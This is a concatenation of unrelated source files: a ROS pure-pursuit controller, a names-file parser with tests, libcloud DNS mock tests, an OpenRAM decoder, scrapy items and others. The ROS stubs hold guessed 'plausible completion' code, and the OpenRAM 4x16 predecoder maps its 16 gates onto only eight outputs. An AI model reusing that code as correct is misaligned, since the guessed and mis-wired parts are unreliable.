The name of reference frame of the robot.
vel_max : float
The maximum linear velocity to command.
K_theta : float
The gain for the angular part of the controller.
alpha : float
The parameter for setting the linear velocity.
"""
self.goal = goal
self.dist = distance
self.cmd_vel_pub = cmd_vel_pub
self.tf_buffer = tf_buffer
self.robot_frame = robot_frame
self.vel_max = vel_max
self.K_theta = K_theta
self.alpha = alpha
self.msg = geometry_msgs.msg.Twist()
return True
def initialise(self):
"""
        Since this is simple proportional control, no initialization is needed. In case
of PI, PD, or PID, the controller would have some state that should
be initialized here.
"""
pass
def update(self):
"""
Do the work:
1) Transform waypoint to robot-centric frame
2) Compute the control signal
3) Publish the control signal
"""
#----------------------------------------------------
# YOUR CODE HERE
# Transform the point to the robot reference frame
self.goal.header.stamp = rospy.Time(0)
        goal_b = self.tf_buffer.transform(self.goal, self.robot_frame)  # assumes tf2_geometry_msgs is imported
#----------------------------------------------------
w, v, dist = go_to_point_controller(goal_b.point.x, goal_b.point.y,
self.vel_max, self.K_theta, self.alpha)
if dist < self.dist:
# Within the desired distance, so return success
return py_trees.Status.SUCCESS
else:
#----------------------------------------------------
# YOUR CODE HERE
# Publish the velocity command to cmd_vel
            self.msg.linear.x = v
            self.msg.angular.z = w
            self.cmd_vel_pub.publish(self.msg)
#----------------------------------------------------
return py_trees.Status.RUNNING
def terminate(self, new_status):
"""
Nothing to clean up
"""
pass
class PursuitGoal(py_trees.behaviour.Behaviour):
"""
Takes two waypoints (current and next) and goes toward a point on
the line joining the two waypoints and at the look-ahead distance.
Returns SUCCESS when the next intermediate goal point is past the
next waypoint.
Returns RUNNING when still moving along the trajectory between the
two waypoints.
Returns FAILURE if no point on the trajectory is at the
look-ahead distance from the robot.
"""
def __init__(self, name="PursuitGoal"):
"""
Default construction.
"""
super(PursuitGoal, self).__init__(name)
self.logger.debug("%s.__init__()" % (self.__class__.__name__))
def setup(self, wp0, wp1, look_ahead_distance,
cmd_vel_pub, tf_buffer, robot_frame='base_link',
vel_max=0.6):
"""
Arguments
---------
wp0 : array-like (2,)
The current waypoint.
wp1 : array-like (2,)
The next waypoint.
look_ahead_distance : float
The main parameter of the pure pursuit algorithm
cmd_vel_pub : Publisher
Publisher that publishes to the /cmd_vel topic
tf_buffer : tf2_ros.Buffer
Transform buffer for transforming the waypoints.
robot_frame : String
The name of reference frame of the robot.
vel_max : float
The maximum linear velocity to command.
"""
self.wp0 = wp0
self.wp1 = wp1
self.L = look_ahead_distance
self.cmd_vel_pub = cmd_vel_pub
self.tf_buffer = tf_buffer
self.robot_frame = robot_frame
self.vel_max = vel_max
self.msg = geometry_msgs.msg.Twist()
return True
def initialise(self):
"""
        Since this is simple proportional control, no initialization is needed. In case
of PI, PD, or PID, the controller would have some state that should
be initialized here.
"""
pass
def update(self):
"""
Do the work:
1) Transform waypoints to robot-centric frame
2) Compute the control signal
3) Publish the control signal
"""
#------------------------------------------------------------
# YOUR CODE HERE
# Transform the two waypoints to the robot reference frame
self.wp0.header.stamp = rospy.Time(0)
self.wp1.header.stamp = rospy.Time(0)
        wp0_b = self.tf_buffer.transform(self.wp0, self.robot_frame)
        wp1_b = self.tf_buffer.transform(self.wp1, self.robot_frame)
#------------------------------------------------------------
pg, beta = get_goal_point([wp0_b.point.x, wp0_b.point.y],
[wp1_b.point.x, wp1_b.point.y],
self.L)
if beta > 1.0:
# Succeeded in moving along the trajectory from current to next waypoint
# Time to move on to next pair of waypoints
return py_trees.Status.SUCCESS
elif np.isnan(beta):
# Not able to find point on trajectory at look-ahead-distance
# from the robot. Means failure.
return py_trees.Status.FAILURE
else:
w = steer_towards_point_controller(pg[0], pg[1], self.vel_max)
#----------------------------------------------------
# YOUR CODE HERE
            # Publish the velocity command to cmd_vel (plausible completion)
            self.msg.linear.x = self.vel_max
            self.msg.angular.z = w
            self.cmd_vel_pub.publish(self.msg)
#----------------------------------------------------
return py_trees.Status.RUNNING
def terminate(self, new_status):
"""
Nothing to clean up
"""
pass
def create_behavior_tree(waypoints, frame, look_ahead_dist, vel_max,
K_theta, alpha):
"""
Constructs and returns the behavior tree.
The tree has only one level with a sequence of nodes, all of which
must succeed in order to perform the task.
"""
# Setup stuff for ROS communication
tf_buffer = tf2_ros.Buffer()
tf2_ros.TransformListener(tf_buffer)
    cmd_vel_pub = rospy.Publisher('/cmd_vel', geometry_msgs.msg.Twist, queue_size=1)
root = py_trees.composites.Sequence("PurePursuit")
# Setup and add node handling the first waypoint. We should go towards this point
# until it is at a distance within the look-ahead-distance from the
# robot.
g2p = Go2Point()
g2p.setup(waypoints[0], look_ahead_dist, cmd_vel_pub, tf_buffer,
vel_max=vel_max, K_theta=K_theta, alpha=alpha)
root.add_child(g2p)
# Add the nodes to handle pairs of waypoints
for cwp_, nwp_ in zip(waypoints[:-1], waypoints[1:]):
pg = PursuitGoal()
pg.setup(cwp_, nwp_, look_ahead_dist, cmd_vel_pub,
tf_buffer, vel_max=vel_max)
root.add_child(pg)
#----------------------------------------------------------------------------
# YOUR CODE HERE
# Add the final node to go to the last waypoint, which is the final goal point
    # (Plausible completion; the 0.1 m arrival threshold is an assumption.)
    g2p_final = Go2Point("Go2FinalPoint")
    g2p_final.setup(waypoints[-1], 0.1, cmd_vel_pub, tf_buffer,
                    vel_max=vel_max, K_theta=K_theta, alpha=alpha)
    root.add_child(g2p_final)
#----------------------------------------------------------------------------
return root
if __name__ == '__main__':
rospy.init_node('Pure_pursuit')
L = rospy.get_param("/pure_pursuit/look_ahead_distance", 0.3)
vmax = rospy.get_param("/pure_pursuit/vel_lin_max", 0.6)
Kth = rospy.get_param("/pure_pursuit/K_theta", 4)
alpha = rospy.get_param("/pure_pursuit/alpha", 4)
frame = rospy.get_param("/pure_pursuit/frame")
rate = rospy.get_param("/pure_pursuit/rate", 10)
waypoints = rospy.get_param("/waypoints", [-4,-4, -4, 2])
waypoints = np.reshape(waypoints, (-1, 2))
waypoints_ps = []
for wp_ in waypoints:
p = PointStamped()
p.header.frame_id = frame
p.point.x = wp_[0]
p.point.y = wp_[1]
waypoints_ps.append(p)
bt_tree = create_behavior_tree(waypoints_ps, frame, L, vmax,
Kth, alpha)
rosrate = rospy.Rate(rate)
while not rospy.is_shutdown():
bt_tree.tick_once()
rosrate.sleep()
| 32.033419 | 91 | 0.539443 |
4a25879b3b9821620d7aacc564df1c717b81e8c1 | 3,445 | py | Python | python/names.py | tmcombi/tmcombi | 976d3f333c01104e5efcabd8834854ad7677ea73 | [
"MIT"
] | null | null | null | python/names.py | tmcombi/tmcombi | 976d3f333c01104e5efcabd8834854ad7677ea73 | [
"MIT"
] | null | null | null | python/names.py | tmcombi/tmcombi | 976d3f333c01104e5efcabd8834854ad7677ea73 | [
"MIT"
] | 3 | 2019-03-31T19:04:20.000Z | 2020-01-13T22:32:09.000Z | import unittest
import re
import sys
class Feature:
def __init__(self):
self.name = 'target'
self.type = ''
self.values = []
def dump(self, out_stream=sys.stdout):
print(self.name + ': ', end='', file=out_stream)
if self.type == 'categorical':
print(', '.join(self.values), end='', file=out_stream)
print('.', file=out_stream)
else:
print(self.type + '.', file=out_stream)
class Names:
def __init__(self):
self.feature = {}
self.feature_list = []
self.target_feature = 'target'
def size(self):
return len(self.feature_list)
def target_index(self):
return self.feature_list.index(self.target_feature)
def dump(self, out_stream=sys.stdout):
print(self.target_feature + '. | the target attribute', file=out_stream)
for feature_name in self.feature_list:
self.feature[feature_name].dump(out_stream)
@staticmethod
def process_line(line):
empty = True
feature = Feature()
line = re.sub(r"\n", "", line)
line = re.sub(r"[ ]*\|.*", "", line)
line = re.sub(r"[\. ]*$", "", line)
line = re.sub(r"^[ ]*", "", line)
if line == '':
return empty, feature
empty = False
data = re.split(":", line, 1)
data[0] = re.sub("[ ]*$", "", data[0])
if re.search(",", data[0]):
data.append(data[0])
else:
feature.name = data[0]
if len(data) < 2:
return empty, feature
data[1] = re.sub("^[ ]*", "", data[1])
if data[1] == '':
return empty, feature
if data[1] in ['continuous', 'ignore', 'label']:
feature.type = data[1]
return empty, feature
feature.type = 'categorical'
for value in re.split(",", data[1]):
value = re.sub("[ ]*$", "", value)
value = re.sub("^[ ]*", "", value)
feature.values.append(value)
return empty, feature
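    # Example (illustrative): process_line('age: continuous.') returns
    # (False, feature) where feature.name == 'age' and
    # feature.type == 'continuous'.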
def from_file(self, file):
fp = open(file, 'r')
empty, target_feature = Names.process_line(fp.readline())
while empty:
empty, target_feature = Names.process_line(fp.readline())
self.target_feature = target_feature.name
line = fp.readline()
while line:
empty, feature = Names.process_line(line)
if not empty:
self.feature[feature.name] = feature
self.feature_list.append(feature.name)
line = fp.readline()
fp.close()
if self.target_feature not in self.feature_list:
self.feature[self.target_feature] = target_feature
self.feature_list.append(self.target_feature)
return self
class TestNames(unittest.TestCase):
def test_feature(self):
f = Feature()
f.name = 'testName'
self.assertEqual(f.name, 'testName')
def test_names_basic(self):
N = Names()
self.assertTrue(N.target_feature == 'target')
self.assertFalse(N.size() < 0)
def test_names_real_file(self):
N = Names().from_file('adult.names')
self.assertEqual(N.size(), 15)
out_stream = open('adult1.names', 'w')
N.dump(out_stream)
out_stream.close()
self.assertFalse(0 > 0)
if __name__ == "__main__":
unittest.main()
| 30.486726 | 80 | 0.543977 |
4a2587c5e149be72f213194eab1e14c14ca53339 | 2,480 | py | Python | tools/state_graph.py | citrix-openstack-build/taskflow | a285c3c39f85e8c7fb6837a8a99f3cdacbe3fea0 | [
"Apache-2.0"
] | null | null | null | tools/state_graph.py | citrix-openstack-build/taskflow | a285c3c39f85e8c7fb6837a8a99f3cdacbe3fea0 | [
"Apache-2.0"
] | null | null | null | tools/state_graph.py | citrix-openstack-build/taskflow | a285c3c39f85e8c7fb6837a8a99f3cdacbe3fea0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import sys
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir))
sys.path.insert(0, top_dir)
import optparse
import subprocess
import tempfile
import networkx as nx
from taskflow import states
from taskflow.utils import graph_utils as gu
def mini_exec(cmd, ok_codes=(0,)):
stdout = subprocess.PIPE
stderr = subprocess.PIPE
proc = subprocess.Popen(cmd, stdout=stdout, stderr=stderr, stdin=None)
(stdout, stderr) = proc.communicate()
rc = proc.returncode
if rc not in ok_codes:
raise RuntimeError("Could not run %s [%s]\nStderr: %s"
% (cmd, rc, stderr))
return (stdout, stderr)
def make_svg(graph, output_filename, output_format):
# NOTE(harlowja): requires pydot!
gdot = gu.export_graph_to_dot(graph)
if output_format == 'dot':
output = gdot
elif output_format in ('svg', 'svgz', 'png'):
with tempfile.NamedTemporaryFile(suffix=".dot") as fh:
fh.write(gdot)
fh.flush()
cmd = ['dot', '-T%s' % output_format, fh.name]
output, _stderr = mini_exec(cmd)
else:
        raise ValueError('Unknown format: %s' % output_format)
with open(output_filename, "wb") as fh:
fh.write(output)
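# Example (illustrative): render a minimal two-state graph to SVG.
#   g = nx.DiGraph()
#   g.add_edge('PENDING', 'RUNNING')
#   make_svg(g, 'states.svg', 'svg')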
def main():
parser = optparse.OptionParser()
parser.add_option("-f", "--file", dest="filename",
help="write svg to FILE", metavar="FILE")
parser.add_option("-t", "--tasks", dest="tasks",
action='store_true',
help="use task state transitions",
default=False)
parser.add_option("-T", "--format", dest="format",
help="output in given format",
default='svg')
(options, args) = parser.parse_args()
if options.filename is None:
options.filename = 'states.%s' % options.format
g = nx.DiGraph(name="State transitions")
if not options.tasks:
source = states._ALLOWED_FLOW_TRANSITIONS
else:
source = states._ALLOWED_TASK_TRANSITIONS
for (u, v) in source:
if not g.has_node(u):
g.add_node(u)
if not g.has_node(v):
g.add_node(v)
g.add_edge(u, v)
make_svg(g, options.filename, options.format)
print("Created %s at '%s'" % (options.format, options.filename))
if __name__ == '__main__':
main()
| 30.243902 | 74 | 0.594758 |
4a2588423ca126a16652a75edd3ee516b30cce8f | 1,839 | py | Python | src/data/game_logs.py | robsfletch/bts | c03d821b048fdc2b2735fd77bd193443d40468fc | [
"MIT"
] | null | null | null | src/data/game_logs.py | robsfletch/bts | c03d821b048fdc2b2735fd77bd193443d40468fc | [
"MIT"
] | null | null | null | src/data/game_logs.py | robsfletch/bts | c03d821b048fdc2b2735fd77bd193443d40468fc | [
"MIT"
] | null | null | null | import pandas as pd
import glob
from pathlib import Path
import click
import logging
@click.command()
@click.argument('input_filepath', type=click.Path(exists=True))
@click.argument('output_filepath', type=click.Path())
def main(input_filepath, output_filepath):
"""clean game_logs"""
df = read_data(input_filepath)
processed_df = process_data(df)
processed_df.to_pickle(Path(output_filepath) / 'game_logs.pkl')
def read_data(input_filepath):
"""Read raw data into DataProcessor."""
game_logs = Path(input_filepath) / 'gl1871_2020'
all_files = glob.glob(str(game_logs / "GL*.TXT"))
header_file = Path(input_filepath) / 'game_log_header.csv'
fields = pd.read_csv(header_file)
header = fields['Header'].to_numpy()
types = pd.Series(fields.Type.values,index=fields.Header).to_dict()
li = []
for filename in all_files:
df = pd.read_csv(filename, header=None, names=header, dtype=types,
low_memory=False)
df = df.drop(columns=df.filter(regex='.*Name$').columns)
li.append(df)
df = pd.concat(li, axis=0, ignore_index=True)
return df
def process_data(df, stable=True):
"""Process raw data into useful files for model."""
df['GAME_ID'] = df['HomeTeam'] + df['Date'].map(str) + \
df['DoubleHeader'].map(str)
df['Date'] = pd.to_datetime(df['Date'], format='%Y%m%d')
df['year'] = df.Date.dt.year
df['HomePA'] = (df['HomeAB'] + df['HomeBB'] +
df['HomeHBP'] + df['HomeSF'] + df['HomeSH'])
df['VisitorPA'] = (df['VisitorAB'] + df['VisitorBB']
+ df['VisitorHBP'] + df['VisitorSF'] + df['VisitorSH'])
return df
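# Example invocation (illustrative; the paths are assumptions):
#   python game_logs.py data/raw data/processed
# This reads GL*.TXT from data/raw/gl1871_2020 plus data/raw/game_log_header.csv
# and writes data/processed/game_logs.pkl.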
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
| 31.169492 | 74 | 0.643828 |
4a2589692e79d07e24145e58412ae10440c2b649 | 686 | py | Python | yidianzixun/splash_test/items.py | zfanai/scrapy-study | 9db78e37e594166ecbf599a37771022a9c99e758 | [
"Apache-2.0"
] | null | null | null | yidianzixun/splash_test/items.py | zfanai/scrapy-study | 9db78e37e594166ecbf599a37771022a9c99e758 | [
"Apache-2.0"
] | null | null | null | yidianzixun/splash_test/items.py | zfanai/scrapy-study | 9db78e37e594166ecbf599a37771022a9c99e758 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
#import scrapy
from scrapy.item import Item, Field
class DmozItem(Item):
# define the fields for your item here like:
name = Field()
description = Field()
url = Field()
class TutorialItem(Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
import scrapy
class SplashTestItem(scrapy.Item):
    # title
    title = scrapy.Field()
    # date
    date = scrapy.Field()
    # link
    url = scrapy.Field()
    # keyword
    keyword = scrapy.Field()
    # source site
    source = scrapy.Field()
| 19.6 | 51 | 0.638484 |
4a258a152e13390926f23b71f8c141ac46288bd8 | 1,873 | py | Python | MimeWriter.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | 1 | 2020-03-12T16:44:10.000Z | 2020-03-12T16:44:10.000Z | MimeWriter.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | MimeWriter.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: MimeWriter
import mimetools
__all__ = [
'MimeWriter']
import warnings
warnings.warn('the MimeWriter module is deprecated; use the email package instead', DeprecationWarning, 2)
class MimeWriter:
def __init__(self, fp):
self._fp = fp
self._headers = []
def addheader(self, key, value, prefix=0):
lines = value.split('\n')
while lines and not lines[-1]:
del lines[-1]
while lines and not lines[0]:
del lines[0]
for i in range(1, len(lines)):
lines[i] = ' ' + lines[i].strip()
value = ('\n').join(lines) + '\n'
line = key + ': ' + value
if prefix:
self._headers.insert(0, line)
else:
self._headers.append(line)
def flushheaders(self):
self._fp.writelines(self._headers)
self._headers = []
def startbody(self, ctype, plist=[], prefix=1):
for name, value in plist:
ctype = ctype + ';\n %s="%s"' % (name, value)
self.addheader('Content-Type', ctype, prefix=prefix)
self.flushheaders()
self._fp.write('\n')
return self._fp
def startmultipartbody(self, subtype, boundary=None, plist=[], prefix=1):
self._boundary = boundary or mimetools.choose_boundary()
return self.startbody('multipart/' + subtype, [
(
'boundary', self._boundary)] + plist, prefix=prefix)
def nextpart(self):
self._fp.write('\n--' + self._boundary + '\n')
return self.__class__(self._fp)
def lastpart(self):
self._fp.write('\n--' + self._boundary + '--\n')
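# Example usage (illustrative sketch, not part of the original module):
#   w = MimeWriter(fp)
#   w.addheader('MIME-Version', '1.0')
#   body = w.startbody('text/plain')
#   body.write('hello\n')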
if __name__ == '__main__':
import test.test_MimeWriter | 29.730159 | 106 | 0.588361 |
4a258b1c203047319fb9ceb1696b461fdc9981a6 | 8,317 | py | Python | libcloud/test/dns/test_digitalocean.py | rgharris/libcloud | 90971e17bfd7b6bb97b2489986472c531cc8e140 | [
"Apache-2.0"
] | null | null | null | libcloud/test/dns/test_digitalocean.py | rgharris/libcloud | 90971e17bfd7b6bb97b2489986472c531cc8e140 | [
"Apache-2.0"
] | 1 | 2021-12-06T12:29:13.000Z | 2021-12-06T12:29:13.000Z | libcloud/test/dns/test_digitalocean.py | rgharris/libcloud | 90971e17bfd7b6bb97b2489986472c531cc8e140 | [
"Apache-2.0"
] | 1 | 2019-08-05T10:12:02.000Z | 2019-08-05T10:12:02.000Z | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
from libcloud.dns.drivers.digitalocean import DigitalOceanDNSDriver
from libcloud.dns.types import RecordType
from libcloud.test import LibcloudTestCase, MockHttp
from libcloud.test.file_fixtures import DNSFileFixtures
from libcloud.test.secrets import DIGITALOCEAN_v2_PARAMS
from libcloud.utils.py3 import httplib
class DigitalOceanDNSTests(LibcloudTestCase):
def setUp(self):
DigitalOceanDNSDriver.connectionCls.conn_class = DigitalOceanDNSMockHttp
DigitalOceanDNSMockHttp.type = None
self.driver = DigitalOceanDNSDriver(*DIGITALOCEAN_v2_PARAMS)
def test_list_zones(self):
zones = self.driver.list_zones()
self.assertTrue(len(zones) >= 1)
def test_get_zone(self):
zone = self.driver.get_zone("testdomain")
self.assertEqual(zone.id, "testdomain")
def test_get_zone_not_found(self):
DigitalOceanDNSMockHttp.type = "NOT_FOUND"
self.assertRaises(Exception, self.driver.get_zone, "testdomain")
def test_list_records(self):
zone = self.driver.get_zone("testdomain")
records = self.driver.list_records(zone)
self.assertTrue(len(records) >= 1)
self.assertEqual(records[1].ttl, 1800)
self.assertEqual(records[4].ttl, None)
def test_get_record(self):
record = self.driver.get_record("testdomain", "1234564")
self.assertEqual(record.id, "1234564")
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, "123.45.67.89")
self.assertEqual(record.ttl, 1800)
def test_get_record_not_found(self):
DigitalOceanDNSMockHttp.type = "NOT_FOUND"
self.assertRaises(Exception, self.driver.get_zone, "testdomain")
def test_create_zone(self):
DigitalOceanDNSMockHttp.type = "CREATE"
zone = self.driver.create_zone("testdomain")
self.assertEqual(zone.id, "testdomain")
def test_create_record(self):
zone = self.driver.get_zone("testdomain")
DigitalOceanDNSMockHttp.type = "CREATE"
record = self.driver.create_record(
"sub", zone, RecordType.A, "234.56.78.90", extra={"ttl": 60}
)
self.assertEqual(record.id, "1234565")
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, "234.56.78.90")
self.assertEqual(record.ttl, 60)
def test_update_record(self):
record = self.driver.get_record("testdomain", "1234564")
DigitalOceanDNSMockHttp.type = "UPDATE"
record = self.driver.update_record(
record, data="234.56.78.90", extra={"ttl": 60}
)
self.assertEqual(record.id, "1234564")
self.assertEqual(record.data, "234.56.78.90")
self.assertEqual(record.ttl, 60)
def test_delete_zone(self):
zone = self.driver.get_zone("testdomain")
DigitalOceanDNSMockHttp.type = "DELETE"
self.assertTrue(self.driver.delete_zone(zone))
def test_delete_record(self):
record = self.driver.get_record("testdomain", "1234564")
DigitalOceanDNSMockHttp.type = "DELETE"
self.assertTrue(self.driver.delete_record(record))
class DigitalOceanDNSMockHttp(MockHttp):
fixtures = DNSFileFixtures("digitalocean")
response_map = {
None: httplib.OK,
"CREATE": httplib.CREATED,
"DELETE": httplib.NO_CONTENT,
"EMPTY": httplib.OK,
"NOT_FOUND": httplib.NOT_FOUND,
"UNAUTHORIZED": httplib.UNAUTHORIZED,
"UPDATE": httplib.OK,
"UNPROCESSABLE": httplib.UNPROCESSABLE_ENTITY,
}
def _v2_domains(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_CREATE(self, method, url, body, headers):
if body is None:
body = self.fixtures.load("_v2_domains_UNPROCESSABLE_ENTITY.json")
return (
self.response_map["UNPROCESSABLE"],
body,
{},
httplib.responses[self.response_map["UNPROCESSABLE"]],
)
body = self.fixtures.load("_v2_domains_CREATE.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_DELETE(self, method, url, body, headers):
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_NOT_FOUND(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain_NOT_FOUND.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain_records.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_CREATE(self, method, url, body, headers):
if body is None:
body = self.fixtures.load("_v2_domains_UNPROCESSABLE_ENTITY.json")
return (
self.response_map["UNPROCESSABLE"],
body,
{},
httplib.responses[self.response_map["UNPROCESSABLE"]],
)
body = self.fixtures.load("_v2_domains_testdomain_records_CREATE.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_1234564(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain_records_1234564.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_1234564_DELETE(self, method, url, body, headers):
self.type = "DELETE"
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_1234564_UPDATE(self, method, url, body, headers):
if body is None:
body = self.fixtures.load("_v2_domains_UNPROCESSABLE_ENTITY.json")
return (
self.response_map["UNPROCESSABLE"],
body,
{},
httplib.responses[self.response_map["UNPROCESSABLE"]],
)
body = self.fixtures.load("_v2_domains_testdomain_records_1234564_UPDATE.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
if __name__ == "__main__":
sys.exit(unittest.main())
| 35.695279 | 88 | 0.635085 |
4a258b9013113f36df8b5c02f8b69c98b857fde0 | 1,540 | py | Python | tmt/plugins.py | RHEmployee/tmt | a21483016cff4ac6959e3294078c16301c9a9778 | [
"MIT"
] | null | null | null | tmt/plugins.py | RHEmployee/tmt | a21483016cff4ac6959e3294078c16301c9a9778 | [
"MIT"
] | null | null | null | tmt/plugins.py | RHEmployee/tmt | a21483016cff4ac6959e3294078c16301c9a9778 | [
"MIT"
] | null | null | null | # coding: utf-8
""" Handle Steps Plugins """
import importlib
import os
import pkgutil
import sys
import fmf
import tmt
log = fmf.utils.Logging('tmt').logger
def explore():
""" Explore all available plugins """
# Check all tmt steps for native plugins
root = os.path.dirname(os.path.realpath(tmt.__file__))
for step in tmt.steps.STEPS:
for module in discover(os.path.join(root, 'steps', step)):
import_(f'tmt.steps.{step}.{module}')
# Check environment variable for user plugins
try:
paths = [
os.path.realpath(os.path.expandvars(os.path.expanduser(path)))
for path in os.environ['TMT_PLUGINS'].split(' ')]
except KeyError:
log.debug('No custom plugin locations detected in TMT_PLUGINS.')
paths = []
for path in paths:
for module in discover(path):
if path not in sys.path:
sys.path.insert(0, path)
import_(module, path)
def import_(module, path=None):
""" Attempt to import requested module """
try:
importlib.import_module(module)
log.debug(f"Successfully imported the '{module}' module.")
except ImportError as error:
raise SystemExit(
f"Failed to import the '{module}' module" +
(f" from '{path}'." if path else ".") + f"\n({error})")
def discover(path):
""" Discover available plugins for given paths """
for _, name, package in pkgutil.iter_modules([path]):
if not package:
yield name
| 27.017544 | 74 | 0.614286 |
4a258bfbdc6270773b858b60a11d0663f8886af6 | 3,499 | py | Python | compiler/modules/hierarchical_predecode4x16.py | marwaneltoukhy/OpenRAM | ed9d32c7bc105db2a438d36d4b2d852152a79e3b | [
"BSD-3-Clause"
] | 1 | 2020-07-05T16:08:47.000Z | 2020-07-05T16:08:47.000Z | compiler/modules/hierarchical_predecode4x16.py | marwaneltoukhy/OpenRAM | ed9d32c7bc105db2a438d36d4b2d852152a79e3b | [
"BSD-3-Clause"
] | null | null | null | compiler/modules/hierarchical_predecode4x16.py | marwaneltoukhy/OpenRAM | ed9d32c7bc105db2a438d36d4b2d852152a79e3b | [
"BSD-3-Clause"
] | null | null | null | # See LICENSE for licensing information.
#
# Copyright (c) 2016-2019 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
from hierarchical_predecode import hierarchical_predecode
from globals import OPTS
class hierarchical_predecode4x16(hierarchical_predecode):
"""
Pre 4x16 decoder used in hierarchical_decoder.
"""
def __init__(self, name, height=None):
hierarchical_predecode.__init__(self, name, 4, height)
self.create_netlist()
if not OPTS.netlist_only:
self.create_layout()
def create_netlist(self):
self.add_pins()
self.add_modules()
self.create_input_inverters()
connections=[["inbar_0", "inbar_1", "inbar_2", "inbar_3", "out_0", "vdd", "gnd"],
["in_0", "inbar_1", "inbar_2", "inbar_3", "out_1", "vdd", "gnd"],
["inbar_0", "in_1", "inbar_2", "inbar_3", "out_2", "vdd", "gnd"],
["in_0", "in_1", "inbar_2", "inbar_3", "out_3", "vdd", "gnd"],
["inbar_0", "inbar_1", "in_2", "inbar_3", "out_4", "vdd", "gnd"],
["in_0", "inbar_1", "in_2", "inbar_3", "out_5", "vdd", "gnd"],
["inbar_0", "in_1", "in_2", "inbar_3", "out_6", "vdd", "gnd"],
["in_0", "in_1", "in_2", "inbar_3", "out_7", "vdd", "gnd"],
["inbar_0", "inbar_1", "inbar_2", "in_3", "out_0", "vdd", "gnd"],
["in_0", "inbar_1", "inbar_2", "in_3", "out_1", "vdd", "gnd"],
["inbar_0", "in_1", "inbar_2", "in_3", "out_2", "vdd", "gnd"],
["in_0", "in_1", "inbar_2", "in_3", "out_3", "vdd", "gnd"],
["inbar_0", "inbar_1", "in_2", "in_3", "out_4", "vdd", "gnd"],
["in_0", "inbar_1", "in_2", "in_3", "out_5", "vdd", "gnd"],
["inbar_0", "in_1", "in_2", "in_3", "out_6", "vdd", "gnd"],
["in_0", "in_1", "in_2", "in_3", "out_7", "vdd", "gnd"] ]
self.create_and_array(connections)
def get_and_input_line_combination(self):
""" These are the decoder connections of the AND gates to the A,B pins """
combination = [["Abar_0", "Abar_1", "Abar_2", "Abar_3"],
["A_0", "Abar_1", "Abar_2", "Abar_3"],
["Abar_0", "A_1", "Abar_2", "Abar_3"],
["A_0", "A_1", "Abar_2", "Abar_3"],
["Abar_0", "Abar_1", "A_2" , "Abar_3"],
["A_0", "Abar_1", "A_2" , "Abar_3"],
["Abar_0", "A_1", "A_2" , "Abar_3"],
["A_0", "A_1", "A_2" , "Abar_3"],
["Abar_0", "Abar_1", "Abar_2", "A_3"],
["A_0", "Abar_1", "Abar_2", "A_3"],
["Abar_0", "A_1", "Abar_2", "A_3"],
["A_0", "A_1", "Abar_2", "A_3"],
["Abar_0", "Abar_1", "A_2", "A_3"],
["A_0", "Abar_1", "A_2", "A_3"],
["Abar_0", "A_1", "A_2", "A_3"],
["A_0", "A_1", "A_2", "A_3"]]
return combination
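    # Note (illustrative): get_and_input_line_combination enumerates all
    # 2**4 = 16 input combinations, one for each predecoder output
    # out_0 .. out_15.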
| 53.830769 | 101 | 0.446127 |
4a258d49102f09a24351d9370b7f2b54fa566347 | 1,399 | py | Python | src/rest_framework_api_key/migrations/0001_initial.py | LundIT/djangorestframework-api-key | 20f4e539140020d88c872249c87a2704ca29e6e7 | [
"MIT"
